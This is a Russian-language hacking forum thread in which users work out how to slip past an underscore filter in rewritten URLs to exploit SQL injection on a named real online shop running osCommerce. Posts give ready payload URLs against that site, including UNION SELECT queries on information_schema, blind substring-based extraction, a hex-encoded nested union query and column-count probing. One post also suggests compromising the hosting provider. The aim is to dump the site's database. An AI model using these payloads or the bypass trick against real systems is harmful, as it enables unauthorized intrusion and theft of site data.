Собственно возник такой вопрос.... Имеем инъекцию вида: http://site.com/super_page_123_321_174.html При http://site.com/super_page_123_321'_174.html Получаем тупую инъекцию в WHERE id='321'' Однако при попытке встроить туда запрос вида: http://site.com/super_page_123_321+union+select+1,`table_name`,3+from+information_schema.tables+limit+1--_174.html Получаем ошибку в связи с тем, что читается строка до символа "_". Вопрос: Можно ли чем-то заменить этот символ в столбце\названии таблицы? Для примера ссылка: http://www.cafegadgets.com/dvd-players-c-63%27_174.html Заранее спасибо!
впринципе нет но так как тут скорее всего мод реврайт, ты можешь в гугле или в вебархиве поискать ссылки где ещё мод реврайт не поставили, мб тебе повезёт или подбирай таблицы вручную
http://www.cafegadgets.com/pioneer-dvr550hs-recorder-p-1976+and+ascii(substring((select+concat_ws(0x2F,table_name,table_schema,column_name)+from+information_schema.columns+limit+0,1),1,1))>5.html Где-то тут был скрипт для посимвольного перебора, возьми его, заюзай и ступай с миром
лол=) спасибо конечно за то что с миром послали, но тема вопроса в том, можно ли это обойти в конкретной ситуации? Я правильно понял, что нет? Только используя скулю в другом месте?
Можно и здесь: Code: http://www.cafegadgets.com/dvd-players-c-63+and%201=2%20union+select+0x3120756e696f6e2073656c6563742076657273696f6e28292c636f6e636174283078326433312c7461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573206c696d697420312c31,0x27,0x27--_174.html
Code: http://www.cafegadgets.com/dvd-players-c-63%20and%20substring(version(),1,1)=5--_174.html Плюсы не испльзовать по этой ссылке, только пробелы или сразу %20 Пятая ветка подбираем кол-во столбцов: Code: http://www.cafegadgets.com/dvd-players-c-63%20union%20select%201,2,3--_174.html дальше сам
Pashkela ты вопрос читал? У человека не проходит символ "_" , он нужен при выборке из information_schema, всё остальное там работает отлично с выводом, как положено
Случай слишком уж частный, т.к. 'двойные' запросы встречаются намного реже чем 'не двойные'. Не будь его здесь - фильтрацию не удалось бы обойти, чего так отчаянно хочет тс (если сейчас еще кто-нибудь чего-нибудь не выдумает). Впрочем я не спорю здесь это превосходно прокатило, а это главное. Нужно прокачивать наблюдательность и смекалку =)
1) найти движок, сайт с движком, сломать сайт другим способом слить движок и ижектить напрямую а не через мод реврайт. 2) попробывать логически пробрутить варианты без мод реврайт. 3) если > 4.0 ветка использывать 0xимя таблицы в хексе. 4) не использывать данный символ а например пробурить по словарику. 5) самый верный 100% ломать хостера. Самый нормальный вариант предложил Scipio но я бы нашел данный движок. 2Pashkela какой смысл использывать посивольный перебор? (c) [cash] hack-shop.org.ru
Ну вот первых это очень компрометирует тебя если не работает метод пост. Во вторных на норм серваках твои ип локнеться после 20 попыток В третих зачем делать посимвольный если есть вывод? а если надо слить базу в 100к записей? И в четвертых какая разница как бирать если и в том и в том случае будет использывать _ ? Приведи хотя бы 1 нормальный аргумент... Читай вопросы внимательнее. (c) [cash] hack-shop.org.ru
А что там искать то? Это oscommerce все баги в паблике , там скули ВЕЗДЕ, я думал вопрос был именно про обход "_". Конечно пример Scipio работает, и подходит к этой ситуации, но в общем и целом это всё-же не выход
2 scipio - спасибо=) Действительно, не подумал использовать запрос в запросе, но это действительно частный случай. 2 all - вопрос стоял именно в обходе фильтрации. Инжект без мод_реврайта скорее всего прокатил бы, но если не брать случай с OsCommerce, то это не так-то просто=\ 2 pashkela - угу, посимвольный перебор конечно true, но когда нужно что-то сдампить, сидеть до второго пришествия как-то не хочется=\ Еще раз всем спасибо, тему можно закрывать.
